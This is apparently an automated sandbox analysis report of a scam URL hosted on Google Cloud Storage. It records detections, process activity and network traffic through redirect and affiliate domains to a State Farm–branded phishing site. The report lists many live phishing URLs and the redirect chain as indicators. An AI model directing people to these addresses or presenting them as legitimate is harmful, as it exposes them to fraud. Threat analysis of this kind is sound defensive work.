Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html

Overview

General Information

Sample URL:https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html
Analysis ID:1348255
Infos:

Detection

GRQ Scam, Phisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Phisher
Yara detected GRQ Scam
Antivirus detection for URL or domain
Stores files to the Windows start menu directory
Creates files inside the system directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 6128 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2220,i,6617707891209174409,3735623123366737918,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4764 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_94JoeSecurity_Phisher_1Yara detected PhisherJoe Security
    SourceRuleDescriptionAuthorStrings
    3.5.pages.csvJoeSecurity_GRQScamYara detected GRQ ScamJoe Security
      3.3.pages.csvJoeSecurity_GRQScamYara detected GRQ ScamJoe Security
        3.7.pages.csvJoeSecurity_GRQScamYara detected GRQ ScamJoe Security
          3.2.pages.csvJoeSecurity_GRQScamYara detected GRQ ScamJoe Security
            3.6.pages.csvJoeSecurity_GRQScamYara detected GRQ ScamJoe Security
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.htmlSlashNext: detection malicious, Label: Fraudulent Website type: Phishing & Social Engineering
              Source: https://sofa.thriveuniversehq.com/people/5.jpgAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/people/1.jpgAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/people/4.jpgAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/assets/images/state-farm-drake-2021.jpgAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/assets/bootstrap/dist/css/bootstrap.min.cssAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/utils/banners/images/2023-months/2023-11.png?v=1Avira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/assets/images/State-Farm-Logo.pngAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/service_worker.jsAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/images/a-favicon.icoAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/people/3.jpgAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/assets/js/scripts-w14-t-f-qc-v2-fst-ri.js?v=5.40&cc=usAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/favicon.icoAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/assets/js/mobile-detect.js-master/mobile-detect.min.jsAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/assets/bootstrap/dist/js/bootstrap.min.jsAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/js/fingerprintjs2/1.5.0/fingerprint2.min.jsAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/manifest.jsonAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/people/2.jpgAvira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/utils/banners/banner-bf.js?v=1.04Avira URL Cloud: Label: phishing
              Source: https://sofa.thriveuniversehq.com/assets/js/ads.jsAvira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_94, type: DROPPED
              Source: https://sofa.thriveuniversehq.com/s3/terms/terms.phpHTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49768 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 2.22.76.127:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.22.76.127:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49762 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49781 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49768 version: TLS 1.0
              Source: unknownDNS traffic detected: queries for: clients2.google.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 2.22.76.127
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /images/icons/product/cloud_storage-32.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://storage.googleapis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
              Source: global trafficHTTP traffic detected: GET /2FRNJG5BQ/GZHBQPR/ HTTP/1.1Host: www.govwlfeloony.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://storage.googleapis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /images/icons/product/cloud_storage-32.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
              Source: global trafficHTTP traffic detected: GET /aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=&view=fb31fd86985514de1142f2f6b3bcea13_0 HTTP/1.1Host: svylst.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://svylst.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: C=848bd2316dc3abc1c9b4aad2b173f936
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: svylst.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: C=848bd2316dc3abc1c9b4aad2b173f936
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /yufapeso/yeje/sudulexu/rocalibu/zo/index.php HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: http://svylst.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4